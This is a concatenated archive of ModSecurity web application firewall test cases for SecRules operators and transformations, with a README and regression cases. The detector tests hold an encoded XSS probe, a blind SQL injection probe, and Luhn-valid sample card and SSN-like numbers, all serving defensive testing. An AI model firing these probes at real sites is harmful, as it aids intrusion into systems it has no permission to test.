modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/base64Encode.json0000644000175000017500000000127613607066311032644 0ustar zimmerlezimmerle[ { "output" : "", "input" : "", "type" : "tfn", "name" : "base64Encode", "ret" : 0 }, { "input" : "TestCase", "name" : "base64Encode", "type" : "tfn", "ret" : 1, "output" : "VGVzdENhc2U=" }, { "output" : "VGVzdENhc2Ux", "ret" : 1, "input" : "TestCase1", "name" : "base64Encode", "type" : "tfn" }, { "input" : "TestCase12", "type" : "tfn", "name" : "base64Encode", "ret" : 1, "output" : "VGVzdENhc2UxMg==" }, { "output" : "VGVzdABDYXNl", "ret" : 1, "name" : "base64Encode", "input" : "Test\\u0000Case", "type" : "tfn" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/base64DecodeExt.json0000644000175000017500000000160713607066311033311 0ustar zimmerlezimmerle[ { "ret" : 0, "input" : "", "type" : "tfn", "name" : "base64DecodeExt", "output" : "" }, { "output" : "TestCase", "ret" : 1, "name" : "base64DecodeExt", "input" : "VGVzdENhc2U=", "type" : "tfn" }, { "output" : "TestCase1", "name" : "base64DecodeExt", "input" : "VGVzdENhc2Ux", "type" : "tfn", "ret" : 1 }, { "ret" : 1, "input" : "VGVzdENhc2UxMg==", "name" : "base64DecodeExt", "type" : "tfn", "output" : "TestCase12" }, { "ret" : 1, "input" : "P.HNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==", "name" : "base64DecodeExt", "type" : "tfn", "output" : "" }, { "output" : "Test\\u0000Case", "input" : "VGVzdABDYXNl", "name" : "base64DecodeExt", "type" : "tfn", "ret" : 1 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/transformations/base64Decode.json0000644000175000017500000000153613607066311032631 0ustar zimmerlezimmerle[ { "ret" : 0, "input" : "", "type" : "tfn", "name" : "base64Decode", "output" : "" }, { "output" : "TestCase", "ret" : 1, "name" : "base64Decode", "input" : "VGVzdENhc2U=", "type" : "tfn" }, { "output" : "TestCase1", "name" : "base64Decode", "input" : "VGVzdENhc2Ux", "type" : "tfn", "ret" : 1 }, { "ret" : 1, "input" : "VGVzdENhc2UxMg==", "name" : "base64Decode", "type" : "tfn", "output" : "TestCase12" }, { "output" : "Test\\u0000Case", "input" : "VGVzdABDYXNl", "name" : "base64Decode", "type" : "tfn", "ret" : 1 }, { "type" : "tfn", "input" : "VGVzdENhc2U=\\u0000VGVzdENhc2U=", "name" : "base64Decode", "ret" : 1, "output" : "TestCase" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/0000755000175000017500000000000013607066311026326 5ustar zimmerlezimmerlemodsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/within.json0000644000175000017500000000153313607066311030525 0ustar zimmerlezimmerle[ { "param" : "", "input" : "", "name" : "within", "type" : "op", "ret" : 1 }, { "name" : "within", "type" : "op", "ret" : 1, "input" : "", "param" : "TestCase" }, { "param" : "", "input" : "TestCase", "type" : "op", "ret" : 0, "name" : "within" }, { "input" : "abc", "param" : "abcdefghi", "ret" : 1, "type" : "op", "name" : "within" }, { "type" : "op", "ret" : 1, "name" : "within", "param" : "abcdefghi", "input" : "def" }, { "name" : "within", "ret" : 1, "type" : "op", "input" : "ghi", "param" : "abcdefghi" }, { "input" : "ghij", "param" : "abcdefghi", "name" : "within", "type" : "op", "ret" : 0 } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/verifysvnr.json0000644000175000017500000000072113607066311031436 0ustar zimmerlezimmerle[ { "param" : "([0-9]{4} ?[0-9]{6})", "input" : "1237010180", "ret" : 1, "type" : "op", "name" : "verifysvnr" }, { "param" : "([0-9]{4} ?[0-9]{6})", "input" : "asdf 1237 010180 asdf", "ret" : 1, "type" : "op", "name" : "verifysvnr" }, { "param" : "([0-9]{4} ?[0-9]{6})", "input" : "asdf 0100817 asdf", "ret" : 0, "type" : "op", "name" : "verifysvnr" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/verifyssn.json0000644000175000017500000000116713607066311031256 0ustar zimmerlezimmerle[ { "param" : "\\d{3}-?\\d{2}-?\\d{4}", "input" : "574-57-8065", "ret" : 1, "type" : "op", "name" : "verifyssn" }, { "param" : "\\d{3}-?\\d{2}-?\\d{4}", "input" : "asdf 574-57-8065 asdf", "ret" : 1, "type" : "op", "name" : "verifyssn" }, { "param" : "\\d{3}-?\\d{2}-?\\d{4}", "input" : "asdf 800-57-8065 asdf", "ret" : 0, "type" : "op", "name" : "verifyssn" }, { "param" : "\\d{3}-?\\d{2}-?\\d{4}", "input" : "asdf 123-45-6789 asdf", "ret" : 0, "type" : "op", "name" : "verifyssn" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/verifycpf.json0000644000175000017500000000053113607066311031215 0ustar zimmerlezimmerle[ { "param" : "([0-9]{3}\\.){2}[0-9]{3}-[0-9]{2}", "input" : "asdf 010.817.514-60 asdf", "ret" : 1, "type" : "op", "name" : "verifycpf" }, { "param" : "([0-9]{3}\\.){2}[0-9]{3}-[0-9]{2}", "input" : "asdf 010.817 asdf", "ret" : 0, "type" : "op", "name" : "verifycpf" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/verifyCC.json0000644000175000017500000002651313607066311030742 0ustar zimmerlezimmerle[ { "input" : "", "param" : "d+", "name" : "verifyCC", "type" : "op", "ret" : 0 }, { "input" : "", "param" : "\\d*", "name" : "verifyCC", "ret" : 0, "type" : "op" }, { "name" : "verifyCC", "type" : "op", "ret" : 0, "input" : "TestCase", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "name" : "verifyCC", "ret" : 0, "type" : "op", "input" : "TestCase", "param" : "TestCase" }, { "param" : ".*", "input" : "TestCase", "name" : "verifyCC", "ret" : 0, "type" : "op" }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "5484605089158216", "name" : "verifyCC", "ret" : 1, "type" : "op" }, { "name" : "verifyCC", "ret" : 1, "type" : "op", "input" : "5574407071707154", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "type" : "op", "ret" : 1, "name" : "verifyCC", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "5351341509714210" }, { "input" : "5585166974020647", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "type" : "op", "ret" : 1, "name" : "verifyCC" }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "5492180332479256", "name" : "verifyCC", "type" : "op", "ret" : 1 }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "5111178142162816", "ret" : 1, "type" : "op", "name" : "verifyCC" }, { "ret" : 1, "type" : "op", "name" : "verifyCC", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "5511424748431031" }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "5259964281562326" }, { "ret" : 1, "type" : "op", "name" : "verifyCC", "input" : "5138342589974385", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "input" : "5362069587634979", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "name" : "verifyCC", "ret" : 1, "type" : "op" }, { "input" : "4916545704601136", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "ret" : 1, "type" : "op", "name" : "verifyCC" }, { "name" : "verifyCC", "ret" : 1, "type" : "op", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "4539501231827691" }, { "name" : "verifyCC", "ret" : 1, "type" : "op", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "4556338049595394" }, { "input" : "4929326438756024", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "ret" : 1, "type" : "op", "name" : "verifyCC" }, { "type" : "op", "ret" : 1, "name" : "verifyCC", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "4485432027326322" }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "4532104980682081", "type" : "op", "ret" : 1, "name" : "verifyCC" }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "4485974616349298" }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "4916580487207199", "name" : "verifyCC", "type" : "op", "ret" : 1 }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "4532009746910413" }, { "name" : "verifyCC", "ret" : 1, "type" : "op", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "4024007144622932" }, { "input" : "4556324125126", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "type" : "op", "ret" : 1, "name" : "verifyCC" }, { "input" : "4067482954141", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "type" : "op", "ret" : 1, "name" : "verifyCC" }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "input" : "4532402654980", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "input" : "4539709679875", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "name" : "verifyCC", "ret" : 1, "type" : "op" }, { "input" : "4024007182237", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "type" : "op", "ret" : 1, "name" : "verifyCC" }, { "type" : "op", "ret" : 1, "name" : "verifyCC", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "343918934573386" }, { "ret" : 1, "type" : "op", "name" : "verifyCC", "input" : "344881778330710", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "input" : "345439478558905", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "input" : "346465614421111", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "name" : "verifyCC", "type" : "op", "ret" : 1 }, { "type" : "op", "ret" : 1, "name" : "verifyCC", "input" : "372263817755618", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "6011402777433576", "name" : "verifyCC", "type" : "op", "ret" : 1 }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "6011890045362751", "name" : "verifyCC", "type" : "op", "ret" : 1 }, { "ret" : 1, "type" : "op", "name" : "verifyCC", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "6011439091242416" }, { "type" : "op", "ret" : 1, "name" : "verifyCC", "input" : "30162519308318", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "30311556856867" }, { "type" : "op", "ret" : 1, "name" : "verifyCC", "input" : "36850112043985", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "201427829075664" }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "201434726660424", "name" : "verifyCC", "type" : "op", "ret" : 1 }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "201453368666085", "name" : "verifyCC", "type" : "op", "ret" : 1 }, { "ret" : 1, "type" : "op", "name" : "verifyCC", "input" : "210091499965007", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "input" : "210072739882947", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "type" : "op", "ret" : 1, "name" : "verifyCC" }, { "input" : "180013970064072", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "type" : "op", "ret" : 1, "name" : "verifyCC" }, { "name" : "verifyCC", "ret" : 1, "type" : "op", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "3096676276259096" }, { "input" : "3158726040010070", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "ret" : 1, "type" : "op", "name" : "verifyCC" }, { "ret" : 1, "type" : "op", "name" : "verifyCC", "input" : "3096531217494742", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "name" : "verifyCC", "ret" : 1, "type" : "op", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "869974262335041" }, { "ret" : 1, "type" : "op", "name" : "verifyCC", "input" : "869905005856398", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)" }, { "input" : "869950500085465", "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "ret" : 1, "type" : "op", "name" : "verifyCC" }, { "param" : "(?:^|[^\\d])(\\d+)(?:[^\\d]|$)", "input" : "1234567890012345", "type" : "op", "ret" : 0, "name" : "verifyCC" }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "input" : "4417123456789113", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "name" : "verifyCC", "ret" : 1, "type" : "op", "input" : "4408041234567893", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "ret" : 0, "type" : "op", "name" : "verifyCC", "input" : "4408041234567890", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "ret" : 0, "type" : "op", "name" : "verifyCC", "input" : "4417123456789112", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "name" : "verifyCC", "type" : "op", "ret" : 1, "input" : "a5484605089158216", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "ret" : 1, "type" : "op", "name" : "verifyCC", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)", "input" : "a5484605089158216b" }, { "type" : "op", "ret" : 1, "name" : "verifyCC", "input" : "5484605089158216b", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "name" : "verifyCC", "ret" : 1, "type" : "op", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)", "input" : "5484-6050-8915-8216" }, { "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)", "input" : "5484605089158217", "name" : "verifyCC", "ret" : 0, "type" : "op" }, { "input" : "5574407071807154", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)", "type" : "op", "ret" : 0, "name" : "verifyCC" }, { "name" : "verifyCC", "type" : "op", "ret" : 0, "input" : "5-484-6050-8915-8216", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "ret" : 0, "type" : "op", "name" : "verifyCC", "input" : "5484 6050 8915 8216", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "input" : "15484605089158216", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)", "name" : "verifyCC", "ret" : 0, "type" : "op" }, { "type" : "op", "ret" : 0, "name" : "verifyCC", "input" : "154846050891582162", "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)" }, { "param" : "(?:^|[^\\d])(\\d{4}\\-?\\d{4}\\-?\\d{2}\\-?\\d{2}\\-?\\d{1,4})(?:[^\\d]|$)", "input" : "54846050891582162", "type" : "op", "ret" : 0, "name" : "verifyCC" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/validateUtf8Encoding.json0000644000175000017500000001614113607066311033233 0ustar zimmerlezimmerle[ { "name" : "validateUtf8Encoding", "type" : "op", "ret" : 0, "input" : "", "param" : "" }, { "name" : "validateUtf8Encoding", "ret" : 0, "type" : "op", "input" : "ὕαλον ϕαγεῖν δύναμαι· τοῦτο οὔ με βλάπτει.", "param" : "" }, { "input" : "Je peux manger du verre, ça ne me fait pas de mal.", "param" : "", "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding" }, { "input" : "Puedo comer vidrio, no me hace daño.", "param" : "", "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding" }, { "param" : "", "input" : "Mi povas manĝi vitron, ĝi ne damaĝas min.", "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding" }, { "param" : "", "input" : "Ic mæg glæs eotan ond hit ne hearmiað me.", "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding" }, { "name" : "validateUtf8Encoding", "type" : "op", "ret" : 0, "input" : "Могу јести стакло а да ми не шкоди.", "param" : "" }, { "param" : "", "input" : "Я могу есть стекло, оно мне не вредит.", "name" : "validateUtf8Encoding", "ret" : 0, "type" : "op" }, { "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding", "param" : "", "input" : "Կրնամ Õ¡ÕºÕ¡Õ¯Õ« ուտել և Õ«Õ¶Õ®Õ« Õ¡Õ¶Õ°Õ¡Õ¶Õ£Õ«Õ½Õ¿ չըներ։" }, { "name" : "validateUtf8Encoding", "ret" : 0, "type" : "op", "param" : "", "input" : "جام ييه بلورم بڭا ضررى طوقونمز" }, { "input" : "मैं काँच खा सकता हूँ, मुझे उस से कोई पीडा नहीं होती.", "param" : "", "name" : "validateUtf8Encoding", "ret" : 0, "type" : "op" }, { "name" : "validateUtf8Encoding", "type" : "op", "ret" : 0, "param" : "", "input" : "أنا قادر على أكل الزجاج و هذا لا يؤلمني." }, { "param" : "", "input" : "אני יכול לאכול זכוכית וזה לא מזיק לי.", "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding" }, { "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding", "param" : "", "input" : "私はガラスを食べられます。それは私を傷つけません。" }, { "param" : "", "input" : "ฉันกินกระจกได้ แต่มันไม่ทำให้ฉันเจ็บ", "type" : "op", "ret" : 0, "name" : "validateUtf8Encoding" }, { "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding", "param" : "", "input" : "나는 유리를 먹을 수 있어요. 그래도 아프지 않아요" }, { "input" : "Tsésǫʼ yishą́ągo bííníshghah dóó doo shił neezgai da.", "param" : "", "name" : "validateUtf8Encoding", "type" : "op", "ret" : 0 }, { "input" : "Ég get etið gler án þess að meiða mig.", "param" : "", "ret" : 0, "type" : "op", "name" : "validateUtf8Encoding" }, { "type" : "op", "ret" : 0, "name" : "validateUtf8Encoding", "input" : "काचं शक्नोम्यत्तुम् । नोपहिनस्ति माम् ॥", "param" : "" }, { "input" : "⠊⠀⠉⠁⠝⠀⠑⠁⠞⠀⠛⠇⠁⠎⠎⠀⠁⠝⠙⠀⠊⠞⠀⠙⠕⠑⠎⠝⠞⠀⠓⠥⠗⠞⠀⠍⠑", "param" : "", "name" : "validateUtf8Encoding", "ret" : 0, "type" : "op" }, { "name" : "validateUtf8Encoding", "type" : "op", "ret" : 0, "param" : "", "input" : "Jeg kan spise glas, det gør ikke ondt pÃ¥ mig." }, { "name" : "validateUtf8Encoding", "ret" : 0, "type" : "op", "param" : "", "input" : "Meg tudom enni az üveget, nem lesz tőle bajom." }, { "type" : "op", "ret" : 0, "name" : "validateUtf8Encoding", "param" : "", "input" : "Ma võin klaasi süüa, see ei tee mulle midagi." }, { "input" : "Mohu jíst sklo, neublíží mi.", "param" : "", "type" : "op", "ret" : 0, "name" : "validateUtf8Encoding" }, { "param" : "", "input" : "Môžem jesÅ¥ sklo. Nezraní ma.", "name" : "validateUtf8Encoding", "type" : "op", "ret" : 0 }, { "param" : "", "input" : "Mogę jeść szkło i mi nie szkodzi.", "type" : "op", "ret" : 0, "name" : "validateUtf8Encoding" }, { "param" : "", "input" : "∮E⋅da=Qn→∞∑f(i)=∏g(i)∀x∈ℝ:⌈x⌉=−⌊−x⌋α∧¬β=¬(¬α∨β)ℕ⊆ℕ₀⊂ℤ⊂ℚ⊂ℝ⊂ℂ⊥)", "ret" : 1, "type" : "op", "name" : "detectXSS" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/detectSQLi.json0000644000175000017500000000053713607066311031227 0ustar zimmerlezimmerle[ { "input" : "", "name" : "detectSQLi", "ret" : 0, "type" : "op" }, { "type" : "op", "ret" : 0, "name" : "detectSQLi", "input" : "this is not isqli" }, { "input" : "ascii(substring(version() from 1 for 1))", "type" : "op", "ret" : 1, "name" : "detectSQLi" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/containsWord.json0000644000175000017500000000370013607066311031673 0ustar zimmerlezimmerle[ { "param" : "", "input" : "", "name" : "containsWord", "type" : "op", "ret" : 1 }, { "param" : "TestCase", "input" : "", "name" : "containsWord", "type" : "op", "ret" : 0 }, { "type" : "op", "ret" : 1, "name" : "containsWord", "input" : "TestCase", "param" : "" }, { "param" : "abc", "input" : "abcdefghi", "ret" : 0, "type" : "op", "name" : "containsWord" }, { "param" : "def", "input" : "abcdefghi", "type" : "op", "ret" : 0, "name" : "containsWord" }, { "input" : "abcdefghi", "param" : "ghi", "type" : "op", "ret" : 0, "name" : "containsWord" }, { "name" : "containsWord", "type" : "op", "ret" : 1, "param" : "abc", "input" : "abc def ghi" }, { "name" : "containsWord", "type" : "op", "ret" : 1, "input" : "abc def ghi", "param" : "def" }, { "type" : "op", "ret" : 1, "name" : "containsWord", "param" : "ghi", "input" : "abc def ghi" }, { "param" : "abc", "input" : "abc\\0def ghi", "name" : "containsWord", "type" : "op", "ret" : 1 }, { "param" : "def", "input" : "abc\\0def ghi", "name" : "containsWord", "type" : "op", "ret" : 1 }, { "name" : "containsWord", "ret" : 1, "type" : "op", "input" : "x", "param" : "x" }, { "type" : "op", "ret" : 1, "name" : "containsWord", "param" : "x", "input" : " x " }, { "input" : "xyz", "param" : "y", "name" : "containsWord", "ret" : 0, "type" : "op" }, { "name" : "containsWord", "ret" : 1, "type" : "op", "input" : "hidingX<-not on word boundary, but is later on->hiding", "param" : "hiding" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/contains.json0000644000175000017500000000237013607066311031041 0ustar zimmerlezimmerle[ { "param" : "", "input" : "", "name" : "contains", "type" : "op", "ret" : 1 }, { "name" : "contains", "ret" : 0, "type" : "op", "input" : "", "param" : "TestCase" }, { "input" : "TestCase", "param" : "", "type" : "op", "ret" : 1, "name" : "contains" }, { "input" : "abcdefghi", "param" : "abc", "type" : "op", "ret" : 1, "name" : "contains" }, { "name" : "contains", "ret" : 1, "type" : "op", "param" : "def", "input" : "abcdefghi" }, { "name" : "contains", "ret" : 1, "type" : "op", "param" : "ghi", "input" : "abcdefghi" }, { "input" : "abcdefghi", "param" : "ghij", "name" : "contains", "type" : "op", "ret" : 0 }, { "input" : "x", "param" : "x", "name" : "contains", "ret" : 1, "type" : "op" }, { "ret" : 1, "type" : "op", "name" : "contains", "input" : "xyz", "param" : "y" }, { "param" : "hiding", "input" : "hidinX<-not quite, but is later on->hiding", "ret" : 1, "type" : "op", "name" : "contains" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/operators/beginsWith.json0000644000175000017500000000136513607066311031331 0ustar zimmerlezimmerle[ { "input" : "", "param" : "", "name" : "beginsWith", "type" : "op", "ret" : 1 }, { "param" : "TestCase", "input" : "", "name" : "beginsWith", "ret" : 0, "type" : "op" }, { "name" : "beginsWith", "ret" : 1, "type" : "op", "param" : "", "input" : "TestCase" }, { "param" : "abcdef", "input" : "abcdef", "ret" : 1, "type" : "op", "name" : "beginsWith" }, { "param" : "abcdef", "input" : "abcdefghi", "ret" : 1, "type" : "op", "name" : "beginsWith" }, { "name" : "beginsWith", "type" : "op", "ret" : 0, "param" : "abcdef", "input" : "abc" } ] modsecurity-v3.0.4/test/test-cases/secrules-language-tests/README.md0000644000175000017500000000342313607066311025571 0ustar zimmerlezimmerle# SecRules Test Set (STS) STS was built to support the development of new implementations of SecRules, and also to avoid regression on the existing ones. The STS does not have any test script, containing only test cases. This repository does not include all the operators supported by ModSecurity. This repository contains operators that are not supported by ModSecurity yet. The tests in this repository came from ModSecurity unit tests (originally saved in the format of a Perl script). These tests were converted from Perl to JSON to make them easier to be opened (and parsed) in different platforms. ## How does it work? All the test cases are saved into text files in JSON format. Every file contains an array of hashes, as illustrated below: ``` { "ret" : 0, "type" : "op", "name" : "gt", "param" : "0", "input" : "" }, ``` The hashes describe the operator to be used with a given parameter and input content to be tested. The outcome result is also part of the hash, allowing the verification if the target application is working as expected. ## Test Organization The directory "operators" contains unit tests for the SecRules operators. The file names are given after the operator name. Notice that the file name is just a matter of organization, and it does not interfere in the test. The operator name is also made explicit inside the test structure. The hash that describes a unit test is disposed in the following structure: - ret: Return code, can be 1 or 0 (True or False) - type: Always "op" - name: Operator name - param: Operator parameter - input: Input data ## How do I add STS to my implementation? It is recommended to add this repository as a git submodule: $ git submodule add https://github.com/SpiderLabs/secrules-language-tests modsecurity-v3.0.4/test/test-cases/secrules-language-tests/.gitignore0000644000175000017500000000001313607066311026272 0ustar zimmerlezimmerle*.log *.trsmodsecurity-v3.0.4/test/test-cases/regression/0000755000175000017500000000000013607066010021716 5ustar zimmerlezimmerlemodsecurity-v3.0.4/test/test-cases/regression/variable-variation-exclusion.json0000644000175000017500000000764613607066010030414 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "version_max":0, "title":"Testing variable variations :: exclusion (1/2)", "client":{ "ip":"200.249.12.31", "port":2313 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language":"en-us,en;q=0.5", "Accept-Encoding":"gzip,deflate", "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive":"300", "Connection":"keep-alive", "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Pragma":"no-cache", "Cache-Control":"no-cache" }, "uri":"\/test.pl?param1= test ¶m2=test2", "method":"GET", "http_version":1.1, "body":"" }, "response":{ "headers":{ "Content-Type":"text\/xml; charset=utf-8\n\r", "Content-Length":"length\n\r" }, "body":[ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected":{ "audit_log":"", "debug_log":"", "error_log":"", "http_code":200 }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Accept|!REMOTE_HOST \"@contains html\" \"id:1,t:lowercase,t:none,block,deny,status:300\"" ] }, { "enabled":1, "version_min":300000, "version_max":0, "title":"Testing variable variations :: exclusion (2/2)", "client":{ "ip":"200.249.12.31", "port":2313 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", "Accept-Language":"en-us,en;q=0.5", "Accept-Encoding":"gzip,deflate", "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Keep-Alive":"300", "Connection":"keep-alive", "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Pragma":"no-cache", "Cache-Control":"no-cache" }, "uri":"\/test.pl?param1= test ¶m2=test2", "method":"GET", "http_version":1.1, "body":"" }, "response":{ "headers":{ "Content-Type":"text\/xml; charset=utf-8\n\r", "Content-Length":"length\n\r" }, "body":[ "\n\r", "\n\r", " \n\r", " \n\r", " string<\/EnlightenResult>\n\r", " <\/EnlightenResponse>\n\r", " <\/soap:Body>\n\r", "<\/soap:Envelope>\n\r" ] }, "expected":{ "audit_log":"", "debug_log":"", "error_log":"", "http_code": 200 }, "rules":[ "SecRuleEngine On", "SecRule REQUEST_HEADERS|!REQUEST_HEADERS \"@contains html\" \"id:1,t:lowercase,t:none,block,deny,status:300\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/variable-variation-count.json0000644000175000017500000001357513607066010027531 0ustar zimmerlezimmerle[ { "enabled": 1, "version_min": 300000, "version_max": 0, "title": "Testing variable variations :: count (1/3)", "client": { "ip": "200.249.12.31", "port": 2313 }, "server": { "ip": "200.249.12.31", "port": 80 }, "request": { "headers": { 